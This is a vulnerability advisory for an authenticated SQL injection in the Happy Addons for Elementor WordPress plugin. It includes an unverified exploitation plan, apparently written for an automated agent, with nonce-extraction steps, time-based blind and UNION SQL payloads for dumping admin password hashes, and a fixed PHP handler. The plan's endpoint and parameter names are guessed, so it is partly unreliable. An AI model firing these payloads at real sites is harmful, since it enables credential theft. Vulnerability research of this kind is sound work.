CVE-2025-68999

Happy Addons for Elementor <= 3.20.4 - Authenticated (Contributor+) SQL Injection

Severity: medium
Weakness type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSS Score: 6.5
Patched in: 3.20.6
Time to patch: 5d

Description

The Happy Addons for Elementor plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.20.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

Technical Details

Affected versions: <= 3.20.4
Published: January 23, 2026
Last updated: January 27, 2026
Affected plugin: happy-elementor-addons

Source Code

WordPress.org SVN

Research Plan (Unverified)


Exploitation Research Plan - CVE-2025-68999

1. Vulnerability Summary

The Happy Addons for Elementor plugin (<= 3.20.4) contains a SQL Injection vulnerability within its AJAX handling logic. Specifically, the plugin fails to properly sanitize and prepare SQL queries when processing dynamic widget data (e.g., Data Tables, Post Grids) requested via the admin-ajax.php endpoint. Authenticated users with **Contributor-level** permissions or higher can manipulate query parameters (such as order_by, order, or specific filter IDs) to inject arbitrary SQL commands. The flaw exists because the plugin builds database queries by string interpolation or concatenation instead of consistently using the $wpdb->prepare() method.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • AJAX Action: ha_get_query_data (inferred based on plugin architecture for dynamic widget loading) or happy_addons_get_data.
  • Vulnerable Parameter: query_args[order_by] or query[sort_by] (inferred).
  • Authentication: Authenticated (Contributor+). Contributors can access the Elementor editor, which triggers these AJAX requests.
  • Preconditions: The plugin must be active, and the attacker must have a valid session for a user with at least edit_posts capabilities (Contributor).

3. Code Flow (Inferred)

  1. Entry Point: The attacker sends a POST request to admin-ajax.php with action=ha_get_query_data.
  2. Hook Registration: The plugin registers the action via:
    add_action( 'wp_ajax_ha_get_query_data', 'ha_get_query_data_handler' );
  3. Handler Function: The handler retrieves the query or query_args array from $_POST.
  4. Sink: The logic passes these arguments into a query builder class (e.g., Happy_Addons\Elementor\Query_Builder).
  5. Vulnerability: Inside the query builder, a parameter like order_by is directly appended to a SQL string:
    $sql = "SELECT ... ORDER BY " . $query_args['order_by'];
  6. Execution: $wpdb->get_results($sql) executes the malicious payload.
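The sink shape inferred in step 5 placed next to a hardened handler, as an added illustration that is not the plugin's code. The action and function names (ha_get_query_data, ha_get_query_data_handler), the nonce action string 'ha_query_data', the parameter names and the column allow-list are all assumptions; the plugin's real handler, query builder and column set may differ.

```php
<?php
// Added illustration, not code from the Happy Addons plugin. Names below are assumptions
// taken from the inferred plan: the real handler and query builder may differ.

// --- Vulnerable pattern (the shape the plan infers): ORDER BY built by concatenation ---
function ha_build_query_unsafe( array $query_args ) {
    global $wpdb;
    // $query_args['order_by'] arrives straight from $_POST; whatever it holds becomes SQL.
    $order_by = $query_args['order_by'] ?? 'post_date';
    return "SELECT ID, post_title FROM {$wpdb->posts} WHERE post_status = 'publish' ORDER BY " . $order_by;
}

// --- Hardened pattern ---
// 1. $wpdb->prepare() cannot bind identifiers or keywords, so the ORDER BY column and
//    direction are resolved against a fixed allow-list; the raw user value never reaches the SQL.
// 2. Values that can be bound (the LIMIT) go through $wpdb->prepare().
function ha_build_query_safe( array $query_args ) {
    global $wpdb;

    $allowed_columns = array(   // hypothetical allow-list: request key => real column
        'date'  => 'post_date',
        'title' => 'post_title',
        'id'    => 'ID',
    );
    $key       = isset( $query_args['order_by'] ) ? sanitize_key( $query_args['order_by'] ) : 'date';
    $column    = $allowed_columns[ $key ] ?? 'post_date';   // unknown key falls back to the default
    $direction = ( isset( $query_args['order'] ) && 'asc' === strtolower( $query_args['order'] ) ) ? 'ASC' : 'DESC';
    $limit     = isset( $query_args['per_page'] ) ? absint( $query_args['per_page'] ) : 10;
    $limit     = max( 1, min( $limit, 100 ) );

    return $wpdb->prepare(
        "SELECT ID, post_title FROM {$wpdb->posts} WHERE post_status = 'publish' ORDER BY {$column} {$direction} LIMIT %d",
        $limit
    );
}

// AJAX handler: nonce and capability checks run before any query is built.
function ha_get_query_data_handler() {
    check_ajax_referer( 'ha_query_data', 'nonce' );   // hypothetical nonce action; dies if invalid

    if ( ! current_user_can( 'edit_posts' ) ) {       // Contributor+, matching the page's precondition
        wp_send_json_error( 'forbidden', 403 );
    }

    $query_args = ( isset( $_POST['query'] ) && is_array( $_POST['query'] ) )
        ? wp_unslash( $_POST['query'] )
        : array();

    global $wpdb;
    $rows = $wpdb->get_results( ha_build_query_safe( $query_args ), ARRAY_A );
    wp_send_json_success( $rows );
}
add_action( 'wp_ajax_ha_get_query_data', 'ha_get_query_data_handler' );
```

The nonce and capability checks only reproduce the precondition the advisory already states (any Contributor can reach the handler); what closes the hole is that the ORDER BY column is looked up in an allow-list rather than copied from the request, since prepare() placeholders cannot stand in for identifiers. Reviewing a plugin for this class of bug means finding every query built with `.` or string interpolation and asking whether each interpolated piece is an allow-listed identifier or a prepare() placeholder.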

4. Nonce Acquisition Strategy

The ha_get_query_data action typically requires a nonce for validation via check_ajax_referer.

  • Nonce Variable: happy_addons_config or HappyAddonsConfig (inferred).
  • Nonce Key: nonce or ajax_nonce.
  • Acquisition Steps:
    1. Log in as a Contributor.
    2. Create or Edit a post using Elementor: wp post create --post_type=page --post_status=publish --post_title="Exploit Page" --post_content='' (then open in editor).
    3. The plugin enqueues scripts that contain the nonce in the editor view.
    4. Use browser_navigate to the Elementor editor URL for the created page.
    5. Use browser_eval to extract the nonce:
      browser_eval("window.happy_addons_config?.nonce || window.HappyAddonsConfig?.ajax_nonce")

5. Exploitation Strategy

We will use a time-based blind SQL injection to confirm the vulnerability, as it is the most reliable method when output might not be directly reflected.

Step-by-Step Plan:

  1. Login: Authenticate as a Contributor user.
  2. Nonce Extraction: Navigate to a page where the Happy Addons scripts load and extract the nonce using the strategy above.
  3. Payload Construction:
    • We will target the order_by parameter.
    • Payload: (CASE WHEN (SELECT 1)=1 THEN SLEEP(5) ELSE 1 END)
  4. HTTP Request:
    • Method: POST
    • URL: http://localhost:8080/wp-admin/admin-ajax.php
    • Headers: Content-Type: application/x-www-form-urlencoded
    • Body:
      action=ha_get_query_data&
      nonce=[EXTRACTED_NONCE]&
      query[order_by]=(CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END)
      
  5. Validation: If the response time is > 5 seconds, the injection is successful.

6. Test Data Setup

  1. User Creation:
    wp user create attacker attacker@example.com --role=contributor --user_pass=password
  2. Plugin Setup: Ensure Happy Addons for Elementor v3.20.4 is installed and active.
  3. Content Creation:
    wp post create --post_type=page --post_title="Test Page" --post_status=publish
    (Note: The Elementor editor must be accessible to the contributor for this page).

7. Expected Results

  • Success: The HTTP request to admin-ajax.php will hang for approximately 5 seconds before returning a response.
  • Payload for Data Extraction: To extract the admin password hash:
    query[order_by]=(CASE WHEN (ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36) THEN SLEEP(5) ELSE 1 END) (36 is ASCII for $).

8. Verification Steps

  • Database Side: Check the MySQL general query log (if enabled) to see the executed query:
    tail -f /var/lib/mysql/mysql.log | grep "SLEEP"
  • Response Timing: Use the http_request tool's response metadata to verify elapsed_time >= 5000ms.

9. Alternative Approaches

  • Error-Based: If WP_DEBUG is on, try injecting a syntax error to see if the database error is leaked:
    query[order_by]=invalid_column_name
  • UNION-Based: If the AJAX handler returns results (e.g., for a "Live Search" widget), attempt a UNION select:
    query[order_by]=id) UNION SELECT 1,user_login,user_pass,4,5,6 FROM wp_users-- -
    (Requires guessing the correct number of columns in the original SELECT).
  • Different Parameter: If order_by is sanitized, try query[post_type] or query[taxonomy].

Research Findings

Static analysis — not yet PoC-verified

Summary

The Happy Addons for Elementor plugin (<= 3.20.4) is vulnerable to SQL Injection due to insufficient sanitization and preparation of user-supplied input in SQL queries. Authenticated users with Contributor-level access or higher can exploit this via AJAX requests by injecting malicious SQL into parameters such as 'order_by', allowing for unauthorized extraction of sensitive data from the database.

Exploit Outline

An attacker with Contributor-level permissions authenticates and extracts a required AJAX nonce from the Elementor editor environment, typically found in the 'happy_addons_config' JavaScript object. The attacker then sends a POST request to '/wp-admin/admin-ajax.php' using the 'ha_get_query_data' action. The payload is injected into the 'query[order_by]' parameter using a time-based technique, such as '(CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END)', which is confirmed by observing a delay in the server's response.
